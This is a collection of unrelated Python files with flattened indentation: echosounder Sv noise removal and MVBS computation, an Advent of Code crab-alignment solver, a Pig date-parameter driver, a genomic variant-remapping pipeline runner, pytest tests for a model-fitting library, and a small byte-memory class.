            if not Sv_threshold:
                return x.Sv.where(x.Sv > (nn + SNR), other=np.nan)
            else:
                return x.Sv.where((x.Sv > (nn + SNR)) & (x.Sv > Sv_threshold), other=np.nan)
# Groupby noise removal operation
proc_data.coords['ping_idx'] = ('ping_time', np.arange(proc_data.Sv['ping_time'].size))
ABS.name = 'ABS'
TVG.name = 'TVG'
pp = xr.merge([proc_data, ABS])
pp = xr.merge([pp, TVG])
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
Sv_clean = pp.groupby_bins('ping_idx', ping_tile_bin_edge).\
map(remove_n, rr=range_bin_tile_bin_edge[0])
Sv_clean = Sv_clean.drop_vars(['ping_idx'])
else:
tmp_clean = []
cnt = 0
for key, val in pp.groupby('frequency'): # iterate over different frequency channel
tmp = val.groupby_bins('ping_idx', ping_tile_bin_edge). \
map(remove_n, rr=range_bin_tile_bin_edge[cnt])
cnt += 1
tmp_clean.append(tmp)
clean_val = np.array([zz.values for zz in xr.align(*tmp_clean, join='outer')])
Sv_clean = xr.DataArray(clean_val,
coords={'frequency': proc_data['frequency'].values,
'ping_time': tmp_clean[0]['ping_time'].values,
'range_bin': tmp_clean[0]['range_bin'].values},
dims=['frequency', 'ping_time', 'range_bin'])
# Set up DataSet
Sv_clean.name = 'Sv'
Sv_clean = Sv_clean.to_dataset()
Sv_clean['noise_est_range_bin_size'] = ('frequency', self.noise_est_range_bin_size)
Sv_clean.attrs['noise_est_ping_size'] = self.noise_est_ping_size
# Attach calculated range into data set
Sv_clean['range'] = (('frequency', 'range_bin'), self.range.T)
        # Save result as an object attribute (written to a netCDF file below if save=True)
self.Sv_clean = Sv_clean
# TODO: now adding the below so that MVBS can be calculated directly
# from the cleaned Sv without saving and loading Sv_clean from disk.
# However this is not explicit to the user. A better way to do this
# is to change get_MVBS() to first check existence of self.Sv_clean
# when `_Sv_clean` is specified as the source_postfix.
if not print_src: # remove noise from Sv stored in memory
self.Sv = Sv_clean.copy()
if save:
self.Sv_clean_path = self.validate_path(save_path=save_path, save_postfix=save_postfix)
print('%s saving denoised Sv to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.Sv_clean_path))
Sv_clean.to_netcdf(self.Sv_clean_path)
# Close opened resources
proc_data.close()
def noise_estimates(self, source_postfix='_Sv', source_path=None,
noise_est_range_bin_size=None, noise_est_ping_size=None):
"""Obtain noise estimates from the minimum mean calibrated power level along each column of tiles.
The tiles here are defined by class attributes noise_est_range_bin_size and noise_est_ping_size.
This method contains redundant pieces of code that also appear in method remove_noise(),
but this method can be used separately to determine the exact tile size for noise removal before
noise removal is actually performed.
Parameters
----------
source_postfix : str
postfix of the Sv file used to calculate noise estimates from, default to '_Sv'
source_path : str
path of Sv file used to calculate noise estimates from, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
                or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulting self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
noise_est_range_bin_size : float
meters per tile for noise estimation [m]
noise_est_ping_size : int
number of pings per tile for noise estimation
Returns
-------
noise_est : xarray DataSet
noise estimates as a DataArray with dimension [ping_time x range_bin]
ping_time and range_bin are taken from the first element of each tile along each of the dimensions
"""
# Check params
if (noise_est_range_bin_size is not None) and (self.noise_est_range_bin_size != noise_est_range_bin_size):
self.noise_est_range_bin_size = noise_est_range_bin_size
if (noise_est_ping_size is not None) and (self.noise_est_ping_size != noise_est_ping_size):
self.noise_est_ping_size = noise_est_ping_size
# Use calibrated data to calculate noise removal
proc_data = self._get_proc_Sv()
# Get tile indexing parameters
self.noise_est_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.noise_est_range_bin_size,
p_tile_sz=self.noise_est_ping_size,
sample_thickness=self.sample_thickness)
# Values for noise estimates
range_meter = self.range
TVG = np.real(20 * np.log10(range_meter.where(range_meter >= 1, other=1)))
ABS = 2 * self.seawater_absorption * range_meter
# Noise estimates
proc_data['power_cal'] = 10 ** ((proc_data.Sv - ABS - TVG) / 10)
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
noise_est = 10 * np.log10(proc_data['power_cal'].coarsen(
ping_time=self.noise_est_ping_size,
range_bin=int(np.unique(self.noise_est_range_bin_size / self.sample_thickness)),
boundary='pad').mean().min(dim='range_bin'))
else:
range_bin_coarsen_idx = (self.noise_est_range_bin_size / self.sample_thickness).astype(int)
tmp_noise = []
for r_bin in range_bin_coarsen_idx:
freq = r_bin.frequency.values
tmp_da = 10 * np.log10(proc_data['power_cal'].sel(frequency=freq).coarsen(
ping_time=self.noise_est_ping_size,
range_bin=r_bin.values,
boundary='pad').mean().min(dim='range_bin'))
tmp_da.name = 'noise_est'
tmp_noise.append(tmp_da)
# Construct a dataArray TODO: this can probably be done smarter using xarray native functions
noise_val = np.array([zz.values for zz in xr.align(*tmp_noise, join='outer')])
noise_est = xr.DataArray(noise_val,
coords={'frequency': proc_data['frequency'].values,
'ping_time': tmp_noise[0]['ping_time'].values},
dims=['frequency', 'ping_time'])
noise_est = noise_est.to_dataset(name='noise_est')
noise_est['noise_est_range_bin_size'] = ('frequency', self.noise_est_range_bin_size)
noise_est.attrs['noise_est_ping_size'] = self.noise_est_ping_size
# Close opened resources
proc_data.close()
return noise_est
def get_MVBS(self, source_postfix='_Sv', source_path=None,
MVBS_range_bin_size=None, MVBS_ping_size=None,
save=False, save_postfix='_MVBS', save_path=None):
"""Calculate Mean Volume Backscattering Strength (MVBS).
The calculation uses class attributes MVBS_ping_size and MVBS_range_bin_size to
calculate and save MVBS as a new attribute to the calling EchoData instance.
MVBS is an xarray DataArray with dimensions ``ping_time`` and ``range_bin``
that are from the first elements of each tile along the corresponding dimensions
in the original Sv or Sv_clean DataArray.
Parameters
----------
source_postfix : str
postfix of the Sv file used to calculate MVBS, default to '_Sv'
source_path : str
path of Sv file used to calculate MVBS, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
                or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulting self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
MVBS_range_bin_size : float, optional
meters per tile for calculating MVBS [m]
MVBS_ping_size : int, optional
number of pings per tile for calculating MVBS
save : bool, optional
whether to save the calculated MVBS into a new .nc file, default to ``False``
save_postfix : str
Filename postfix, default to '_MVBS'
save_path : str
Full filename to save to, overwriting the RAWFILENAME_MVBS.nc default
"""
# Check params
if (MVBS_range_bin_size is not None) and (self.MVBS_range_bin_size != MVBS_range_bin_size):
self.MVBS_range_bin_size = MVBS_range_bin_size
if (MVBS_ping_size is not None) and (self.MVBS_ping_size != MVBS_ping_size):
self.MVBS_ping_size = MVBS_ping_size
# Get Sv by validating path and calibrate if not already done
if self.Sv is not None:
print('%s use Sv stored in memory to calculate MVBS' % dt.datetime.now().strftime('%H:%M:%S'))
print_src = False
else:
print_src = True
proc_data = self._get_proc_Sv(source_path=source_path, source_postfix=source_postfix)
if print_src:
if self.Sv_path is not None:
print('%s Sv source used to calculate MVBS: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
else:
print('%s Sv source used to calculate MVBS: memory' %
dt.datetime.now().strftime('%H:%M:%S'))
# Get tile indexing parameters
self.MVBS_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.MVBS_range_bin_size,
p_tile_sz=self.MVBS_ping_size,
sample_thickness=self.sample_thickness)
# Calculate MVBS
Sv_linear = 10 ** (proc_data.Sv / 10) # convert to linear domain before averaging
# check if the number of range_bin per tile is the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
MVBS = 10 * np.log10(Sv_linear.coarsen(
ping_time=self.MVBS_ping_size,
range_bin=int(np.unique(self.MVBS_range_bin_size / self.sample_thickness)),
boundary='pad').mean())
MVBS.coords['range_bin'] = ('range_bin', np.arange(MVBS['range_bin'].size))
else:
range_bin_coarsen_idx = (self.MVBS_range_bin_size / self.sample_thickness).astype(int)
tmp_MVBS = []
for r_bin in range_bin_coarsen_idx:
freq = r_bin.frequency.values
tmp_da = 10 * np.log10(Sv_linear.sel(frequency=freq).coarsen(
ping_time=self.MVBS_ping_size,
range_bin=r_bin.values,
boundary='pad').mean())
tmp_da.coords['range_bin'] = ('range_bin', np.arange(tmp_da['range_bin'].size))
tmp_da.name = 'MVBS'
tmp_MVBS.append(tmp_da)
# Construct a DataArray. TODO: this can probably be done more cleanly with native xarray functions
MVBS_val = np.array([zz.values for zz in xr.align(*tmp_MVBS, join='outer')])
MVBS = xr.DataArray(MVBS_val,
coords={'frequency': Sv_linear['frequency'].values,
'ping_time': tmp_MVBS[0]['ping_time'].values,
'range_bin': np.arange(MVBS_val.shape[2])},
dims=['frequency', 'ping_time', 'range_bin']).dropna(dim='range_bin', how='all')
# Set MVBS attributes
MVBS.name = 'MVBS'
MVBS = MVBS.to_dataset()
MVBS['MVBS_range_bin_size'] = ('frequency', self.MVBS_range_bin_size)
MVBS.attrs['MVBS_ping_size'] = self.MVBS_ping_size
# Save results in object and as a netCDF file
self.MVBS = MVBS
if save:
self.MVBS_path = self.validate_path(save_path=save_path, save_postfix=save_postfix)
print('%s saving MVBS to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.MVBS_path))
MVBS.to_netcdf(self.MVBS_path)
# Close opened resources
proc_data.close()
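# --- Illustrative sketch (not part of this method; array sizes and values are
# assumptions) of the coarsen-based tiling used above: average Sv in the linear
# domain over (ping_time, range_bin) tiles, then convert back to dB.
#
#   import numpy as np
#   import xarray as xr
#   sv = xr.DataArray(np.random.uniform(-80, -30, (100, 1000)),
#                     dims=['ping_time', 'range_bin'])
#   sv_linear = 10 ** (sv / 10)
#   mvbs = 10 * np.log10(sv_linear.coarsen(ping_time=10, range_bin=100,
#                                          boundary='pad').mean())
#   # mvbs has shape (10, 10): one value per 10-ping x 100-range_bin tile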
|
import numpy as np
test = False
with open(f"../input/{'test_' if test else ''}day7.txt") as f:
# :pinchers:
crabs = np.array([int(x) for x in f.read().strip().split(",")])
def sim_p1(h):
# d/dh | x - h | = sgn(h - x)
return np.sum(np.abs(crabs - h)), np.sum(np.sign(h - crabs))
def sim_p2(h):
# let k = |x_i - h|
# cost = k * (k + 1) / 2
# so d/dh = sgn(h - x) / 2 + (h - x)
d = np.abs(crabs - h)
err = np.sum((d * (d + 1)) / 2)
dh = np.sum(.5 * np.sign(h - crabs) + (h - crabs))
return err, dh
def solve(sim):
# arbitrary starting point and learning rate for the gradient descent
sol = 5
alpha = .00005
for i in range(100000):
err, dh = sim(sol)
if abs(dh) < 1e-4:
break
sol -= dh * alpha
err, _ = sim(round(sol))
print(f"sol: {sol} -> {round(sol)}, err: {err}")
if __name__ == "__main__":
solve(sim_p1)
solve(sim_p2)
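    # Note (illustrative alternative, not used above): both parts also admit a
    # direct solution; part 1's cost sum(|x - h|) is minimised by the median of
    # the positions, and part 2's near-quadratic cost is minimised within 0.5 of
    # the mean, so checking floor(mean) and floor(mean) + 1 suffices:
    #
    #   best_p1 = int(np.median(crabs))
    #   m = int(np.mean(crabs))
    #   best_p2 = min(m, m + 1, key=lambda h: sim_p2(h)[0])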
|
#!/usr/bin/python
import time
from org.apache.pig.scripting import *
__author__ = 'wangwei'
def getParams():
params=[]
cdate=startDate
while cmp(cdate, endDate) != 0:
d={"DATE":cdate}
params.append(d)
timeArray = time.strptime(cdate, "%Y-%m-%d")
timeStamp = int(time.mktime(timeArray))
timeStamp += 86400
timeArray = time.localtime(timeStamp)
cdate = time.strftime("%Y-%m-%d", timeArray)
return params
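# Example of the produced parameter list (for the dates set in __main__ below):
#   [{'DATE': '2014-08-01'}, {'DATE': '2014-08-02'}, ..., {'DATE': '2014-08-13'}]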
if __name__ == '__main__':
startDate = '2014-08-01'
endDate = '2014-08-14'  # end date is exclusive
Pig.registerUDF("./getDateHour.py", "timeUDFS")
pig = Pig.compileFromFile('./priceFluctuate.pig')
bound = pig.bind(getParams())
bound.run()
|
#!/usr/bin/env python
import os
import re
import subprocess
import sys
from argparse import ArgumentParser
from datetime import datetime
import yaml
from ebi_eva_common_pyutils import command_utils
from ebi_eva_common_pyutils.command_utils import run_command_with_output
from ebi_eva_common_pyutils.config import cfg
from ebi_eva_common_pyutils.config_utils import get_primary_mongo_creds_for_profile, get_accession_pg_creds_for_profile
from ebi_eva_common_pyutils.logger import logging_config, AppLogger
from ebi_eva_common_pyutils.metadata_utils import get_metadata_connection_handle
from ebi_eva_common_pyutils.pg_utils import get_all_results_for_query, execute_query
sys.path.append(os.path.dirname(__file__))
from remapping_config import load_config
def pretty_print(header, table):
cell_widths = [len(h) for h in header]
for row in table:
for i, cell in enumerate(row):
cell_widths[i] = max(cell_widths[i], len(str(cell)))
format_string = ' | '.join('{%s:>%s}' % (i, w) for i, w in enumerate(cell_widths))
print('| ' + format_string.format(*header) + ' |')
for row in table:
print('| ' + format_string.format(*row) + ' |')
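# Usage sketch (illustrative values):
#   pretty_print(['Assembly', 'Status'], [['GCA_000001405.1', 'Completed']])
# prints right-aligned, pipe-delimited rows such as:
#   |        Assembly |    Status |
#   | GCA_000001405.1 | Completed |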
class RemappingJob(AppLogger):
@staticmethod
def write_remapping_process_props_template(template_file_path):
mongo_host, mongo_user, mongo_pass = get_primary_mongo_creds_for_profile(cfg['maven']['environment'],
cfg['maven']['settings_file'])
pg_url, pg_user, pg_pass = get_accession_pg_creds_for_profile(cfg['maven']['environment'],
cfg['maven']['settings_file'])
with open(template_file_path, 'w') as open_file:
open_file.write(f'''spring.datasource.driver-class-name=org.postgresql.Driver
spring.datasource.url={pg_url}
spring.datasource.username={pg_user}
spring.datasource.password={pg_pass}
spring.datasource.tomcat.max-active=3
spring.jpa.generate-ddl=true
spring.data.mongodb.host={mongo_host}
spring.data.mongodb.port=27017
spring.data.mongodb.database=eva_accession_sharded
spring.data.mongodb.username={mongo_user}
spring.data.mongodb.password={mongo_pass}
spring.data.mongodb.authentication-database=admin
mongodb.read-preference=secondaryPreferred
spring.main.web-environment=false
spring.main.allow-bean-definition-overriding=true
spring.jpa.properties.hibernate.jdbc.lob.non_contextual_creation=true
logging.level.uk.ac.ebi.eva.accession.remapping=INFO
parameters.chunkSize=1000
''')
return template_file_path
def get_job_information(self, assembly, taxid):
query = (
'SELECT source, scientific_name, assembly_accession, remapping_status, SUM(num_studies), '
'SUM(num_ss_ids) '
'FROM eva_progress_tracker.remapping_tracker '
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}' "
'GROUP BY source, origin_assembly_accession, scientific_name, assembly_accession, remapping_status'
)
source_set = set()
progress_set = set()
scientific_name = None
target_assembly = None
n_study = 0
n_variants = 0
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
for source, scientific_name, target_assembly, progress_status, n_st, n_var in get_all_results_for_query(pg_conn, query):
source_set.add(source)
if progress_status:
progress_set.add(progress_status)
n_study += n_st
n_variants += n_var
sources = ', '.join(source_set)
if progress_set:
progress_status = ', '.join(progress_set)
else:
progress_status = 'Pending'
return sources, scientific_name, target_assembly, progress_status, n_study, n_variants
def list_assemblies_to_process(self):
query = 'SELECT DISTINCT origin_assembly_accession, taxonomy FROM eva_progress_tracker.remapping_tracker'
header = ['Sources', 'Scientific_name', 'Assembly', 'Taxonomy ID', 'Target Assembly', 'Progress Status',
'Num Of Studies', 'Num Of Variants']
rows = []
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
for assembly, taxid in get_all_results_for_query(pg_conn, query):
sources, scientific_name, target_assembly, progress_status, n_study, n_variants = \
self.get_job_information(assembly, taxid)
rows.append([sources, scientific_name, assembly, taxid, target_assembly, progress_status, n_study, n_variants])
# print('\t'.join(str(e) for e in [sources, scientific_name, assembly, taxid, target_assembly, progress_status, n_study, n_variants]))
pretty_print(header, rows)
def set_status_start(self, assembly, taxid):
query = ('UPDATE eva_progress_tracker.remapping_tracker '
f"SET remapping_status='Started', remapping_start = '{datetime.now().isoformat()}' "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def set_status_end(self, assembly, taxid):
query = ('UPDATE eva_progress_tracker.remapping_tracker '
f"SET remapping_status='Completed', remapping_end = '{datetime.now().isoformat()}' "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def set_status_failed(self, assembly, taxid):
query = ('UPDATE eva_progress_tracker.remapping_tracker '
f"SET remapping_status = 'Failed' "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def set_counts(self, assembly, taxid, source, nb_variant_extracted=None, nb_variant_remapped=None,
nb_variant_ingested=None):
set_statements = []
query = (f"SELECT * FROM eva_progress_tracker.remapping_tracker "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}' AND source='{source}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
# Check that this row exists
results = get_all_results_for_query(pg_conn, query)
if results:
if nb_variant_extracted is not None:
set_statements.append(f"num_ss_extracted = {nb_variant_extracted}")
if nb_variant_remapped is not None:
set_statements.append(f"num_ss_remapped = {nb_variant_remapped}")
if nb_variant_ingested is not None:
set_statements.append(f"num_ss_ingested = {nb_variant_ingested}")
if set_statements:
query = ('UPDATE eva_progress_tracker.remapping_tracker '
'SET ' + ', '.join(set_statements) + ' '
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}' AND source='{source}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def set_version(self, assembly, taxid, remapping_version=1):
query = ('UPDATE eva_progress_tracker.remapping_tracker '
f"SET remapping_version='{remapping_version}' "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def check_processing_required(self, assembly, target_assembly, n_variants):
    return str(target_assembly) != 'None' and assembly != target_assembly and int(n_variants) > 0
def process_one_assembly(self, assembly, taxid, resume):
self.set_status_start(assembly, taxid)
base_directory = cfg['remapping']['base_directory']
sources, scientific_name, target_assembly, progress_status, n_study, n_variants = self.get_job_information(assembly, taxid)
if not self.check_processing_required(assembly, target_assembly, n_variants):
self.info(f'Not processing assembly {assembly} -> {target_assembly} for taxonomy {taxid}: '
f'{n_study} studies with {n_variants} variants '
f'found in {sources}')
self.set_status_end(assembly, taxid)
return
self.info(f'Processing assembly {assembly} for taxonomy {taxid}: {n_study} studies with {n_variants} variants '
f'found in {sources}')
nextflow_remapping_process = os.path.join(os.path.dirname(__file__), 'remapping_process.nf')
assembly_directory = os.path.join(base_directory, taxid, assembly)
work_dir = os.path.join(assembly_directory, 'work')
prop_template_file = os.path.join(assembly_directory, 'template.properties')
os.makedirs(work_dir, exist_ok=True)
remapping_log = os.path.join(assembly_directory, 'remapping_process.log')
remapping_config_file = os.path.join(assembly_directory, 'remapping_process_config_file.yaml')
remapping_config = {
'taxonomy_id': taxid,
'source_assembly_accession': assembly,
'target_assembly_accession': target_assembly,
'species_name': scientific_name,
'output_dir': assembly_directory,
'genome_assembly_dir': cfg['genome_downloader']['output_directory'],
'template_properties': self.write_remapping_process_props_template(prop_template_file),
'remapping_config': cfg.config_file
}
for part in ['executable', 'nextflow', 'jar']:
remapping_config[part] = cfg[part]
with open(remapping_config_file, 'w') as open_file:
yaml.safe_dump(remapping_config, open_file)
try:
command = [
cfg['executable']['nextflow'],
'-log', remapping_log,
'run', nextflow_remapping_process,
'-params-file', remapping_config_file,
'-work-dir', work_dir
]
if resume:
command.append('-resume')
curr_working_dir = os.getcwd()
os.chdir(assembly_directory)
command_utils.run_command_with_output('Nextflow remapping process', ' '.join(command))
except subprocess.CalledProcessError as e:
self.error('Nextflow remapping pipeline failed')
self.set_status_failed(assembly, taxid)
raise e
finally:
os.chdir(curr_working_dir)
self.set_status_end(assembly, taxid)
self.count_variants_from_logs(assembly_directory, assembly, taxid)
self.set_version(assembly, taxid)
def count_variants_from_logs(self, assembly_directory, assembly, taxid):
vcf_extractor_log = os.path.join(assembly_directory, 'logs', assembly + '_vcf_extractor.log')
eva_remapping_count = os.path.join(assembly_directory, 'eva', assembly + '_eva_remapped_counts.yml')
dbsnp_remapping_count = os.path.join(assembly_directory, 'dbsnp', assembly + '_dbsnp_remapped_counts.yml')
eva_ingestion_log = os.path.join(assembly_directory, 'logs', assembly + '_eva_remapped.vcf_ingestion.log')
dbsnp_ingestion_log = os.path.join(assembly_directory, 'logs', assembly + '_dbsnp_remapped.vcf_ingestion.log')
eva_total, eva_written, dbsnp_total, dbsnp_written = count_variants_extracted(vcf_extractor_log)
eva_candidate, eva_remapped, eva_unmapped = count_variants_remapped(eva_remapping_count)
dbsnp_candidate, dbsnp_remapped, dbsnp_unmapped = count_variants_remapped(dbsnp_remapping_count)
# Use the number of variants read rather than the number of variants ingested to get the total count,
# since some variants might have been written in a previous execution.
eva_ingestion_candidate, eva_ingested, eva_duplicates = count_variants_ingested(eva_ingestion_log)
dbsnp_ingestion_candidate, dbsnp_ingested, dbsnp_duplicates = count_variants_ingested(dbsnp_ingestion_log)
self.set_counts(
assembly, taxid, 'EVA',
nb_variant_extracted=eva_written,
nb_variant_remapped=eva_remapped,
nb_variant_ingested=eva_ingestion_candidate
)
self.set_counts(
assembly, taxid, 'DBSNP',
nb_variant_extracted=dbsnp_written,
nb_variant_remapped=dbsnp_remapped,
nb_variant_ingested=dbsnp_ingestion_candidate
)
self.info(f'For Taxonomy: {taxid} and Assembly: {assembly} Source: EVA')
self.info(f'Number of variants read: {eva_total}, written: {eva_written}, attempted remapping: {eva_candidate}, '
f'remapped: {eva_remapped}, failed remapping: {eva_unmapped}')
self.info(f'For Taxonomy: {taxid} and Assembly: {assembly} Source: DBSNP')
self.info(f'Number of variants read: {dbsnp_total}, written: {dbsnp_written}, attempted remapping: {dbsnp_candidate}, '
f'remapped: {dbsnp_remapped}, failed remapping: {dbsnp_unmapped}')
def count_variants_remapped(count_yml_file):
with open(count_yml_file) as open_file:
data = yaml.safe_load(open_file)
candidate_variants = data.get('all')
remapped_variants = data.get('Flank_50', {}).get('Remapped', 0) + \
data.get('Flank_2000', {}).get('Remapped', 0) + \
data.get('Flank_50000', {}).get('Remapped', 0)
# parenthesise (filtered or 0): '+' binds tighter than 'or', so the original expression dropped the flank term
unmapped_variants = (data.get('filtered') or 0) + \
(data.get('Flank_50000', {}).get('total', 0) - data.get('Flank_50000', {}).get('Remapped', 0))
return candidate_variants, remapped_variants, unmapped_variants
def parse_log_line(line, regex_list=None):
if not regex_list:
regex_list = [r'Items read = (\d+)', r'items written = (\d+)']
results = []
for regex in regex_list:
match = re.search(regex, line)
if match:
results.append(int(match.group(1)))
else:
results.append(None)
return tuple(results)
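# Example with the default regexes (illustrative log line):
#   parse_log_line('... Items read = 120, items written = 115 ...')  ->  (120, 115)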
def count_variants_extracted(extraction_log):
command = f'grep "EXPORT_EVA_SUBMITTED_VARIANTS_STEP" {extraction_log} | tail -1'
log_line = run_command_with_output('Get total number of eva variants written', command, return_process_output=True)
eva_total, eva_written = parse_log_line(log_line)
command = f'grep "EXPORT_DBSNP_SUBMITTED_VARIANTS_STEP" {extraction_log} | tail -1'
log_line = run_command_with_output('Get total number of dbsnp variants written', command, return_process_output=True)
dbsnp_total, dbsnp_written = parse_log_line(log_line)
return eva_total, eva_written, dbsnp_total, dbsnp_written
def count_variants_ingested(ingestion_log):
command = f'grep "INGEST_REMAPPED_VARIANTS_FROM_VCF_STEP" {ingestion_log} | tail -1'
log_line = run_command_with_output('Get total number of variants written', command, return_process_output=True)
regex_list = [r'Items \(remapped ss\) read = (\d+)', r'ss ingested = (\d+)', r'ss skipped \(duplicate\) = (\d+)']
ss_read, ss_written, ss_duplicates = parse_log_line(log_line, regex_list)
return ss_read, ss_written, ss_duplicates
def main():
argparse = ArgumentParser(description='Run entire variant remapping pipeline for a given assembly and taxonomy.')
argparse.add_argument('--assembly', help='Assembly to be processed')
argparse.add_argument('--taxonomy_id', help='Taxonomy id to be processed')
argparse.add_argument('--list_jobs', help='Display the list of jobs to be run.', action='store_true', default=False)
argparse.add_argument('--resume', help='If a process has been run already this will resume it.',
action='store_true', default=False)
args = argparse.parse_args()
load_config()
if args.list_jobs:
RemappingJob().list_assemblies_to_process()
elif args.assembly and args.taxonomy_id:
logging_config.add_stdout_handler()
RemappingJob().process_one_assembly(args.assembly, args.taxonomy_id, args.resume)
else:
# ArgumentParser.error() prints the usage message and exits; raising ArgumentError directly requires an argument object
argparse.error('One of (--assembly and --taxonomy_id) or --list_jobs options is required')
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""
:Author: Dominic
"""
import sys
sys.path.append("../")
import pytest
import numpy as np
from fitAlgs.fitAlg import FitAlg
from modelGenerator import ModelGen
from fitAlgs.fitSims import FitSim
@pytest.fixture(scope="function")
def model_setup():
number_actions = 2
number_cues = 1
model_parameters = {'alpha': (0, 1),
'beta': (0, 30)}
model_static_args = {'number_actions': number_actions,
'number_cues': number_cues,
'action_codes': {1: 0, 2: 1},
'expect': np.full(number_actions, 0.5, float),
'prior': np.full(number_actions, 1 / number_actions, float),
'stimulus_shaper_name': 'StimulusDecksLinear',
'reward_shaper_name': 'RewardDecksNormalised',
'decision_function_name': 'weightProb',
'task_responses': [1, 2]}
models = ModelGen(model_name='QLearn',
parameters=model_parameters,
other_options=model_static_args)
modelInfos = [m for m in models.iter_details()]
modelInfo = modelInfos[0]
model = modelInfo[0]
modelSetup = modelInfo[1:]
return model, modelSetup
@pytest.fixture(scope='function')
def sim_setup():
fit_sim = FitSim(participant_choice_property='Choices',
participant_reward_property='Rewards',
model_fitting_variable='ActionProb',
task_stimuli_property=None,
fit_subset=None,
action_options_property=[1, 2])
return fit_sim
@pytest.fixture(scope='session')
def participant_data_setup():
participant_data = {'Rewards': [1.0, 0.0, 0.0, 1.0, 0.0, 1.0, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
'Stimuli': [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
'non_action': u'None',
'valid_actions_combined': [['E', 'F'], ['E', 'F'], ['A', 'B'], ['E', 'F'], ['E', 'F'],
['E', 'F'], ['D', 'B'], ['E', 'D'], ['C', 'B'], ['E', 'C'],
['A', 'D'], ['A', 'F']],
'simID': '0',
'Decisions': ['E', 'F', 'B', 'E', 'E', 'F', 'D', 'E', 'C', 'C', 'A', 'A'],
'Choices': [1, 2, 2, 1, 1, 2, 2, 1, 1, 2, 2, 2]}
return participant_data
class TestClass_fitAlg:
def test_FA_none(self):
with pytest.raises(NameError, match='Please specify bounds for your parameters'):
fit_alg = FitAlg()
def test_FA_bounds(self):
fit_alg = FitAlg(bounds={'alpha': (0, 1), 'beta': (0, np.inf)})
assert isinstance(fit_alg, FitAlg)
def test_FA_info(self):
bounds = {'alpha': (0, 1), 'beta': (0, np.inf)}
fit_alg = FitAlg(bounds=bounds)
results = fit_alg.info()
correct_results_alg = {'Name': 'FitAlg',
'fit_measure_function': '-loge',
'fit_measure_arguments': {},
'boundary_cost_function': None,
'bounds': bounds,
'extra_fit_measures': [],
'calculate_covariance': False,
'bound_ratio': 10**-6}
correct_results_sim = {'Name': 'FitSim',
'participant_choice_property': 'Actions',
'participant_reward_property': 'Rewards',
'task_stimuli_property': None,
'action_options_property': None,
'model_fitting_variable': 'ActionProb',
'float_error_response_value': 10 ** -100,
'fit_subset': None}
for res_key, res_val in results.items():
if res_key == 'FitSim':
for sim_key, sim_val in results[res_key].items():
assert sim_val == correct_results_sim[sim_key]
else:
assert res_val == correct_results_alg[res_key]
def test_FA_basic(self, sim_setup):
fit_alg = FitAlg(fit_sim=sim_setup,
fit_measure='-loge',
fit_measure_args={"numParams": 2,
"number_actions": 2,
"qualityThreshold": 20,
"randActProb": 1/2},
extra_fit_measures=['-2log', 'BIC', 'r2', 'bayesFactor', 'BIC2norm'],
bounds={'alpha': (0, 1), 'beta': (0, np.inf)})
assert isinstance(fit_alg, FitAlg)
if __name__ == '__main__':
pytest.main()
# pytest.set_trace()
|
class Memory:
    """Flat byte-addressable memory; the 16-bit accessors are big-endian."""
    def __init__(self, sizeInBytes):
        self.array = bytearray(sizeInBytes)
    def get(self, address):
        return self.array[address]
    def get16(self, address):
        # big-endian: high byte first
        return (self.array[address] << 8) + self.array[address + 1]
    def set(self, address, value):
        self.array[address] = value
    def set16(self, address, value):
        # mask each byte so values wider than 16 bits cannot raise on bytearray assignment
        self.array[address] = (value >> 8) & 0xFF
        self.array[address + 1] = value & 0xFF
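# Minimal usage sketch (illustrative): the 16-bit accessors are big-endian.
if __name__ == "__main__":
    mem = Memory(16)
    mem.set16(0, 0x1234)
    assert mem.get(0) == 0x12 and mem.get(1) == 0x34  # high byte stored first
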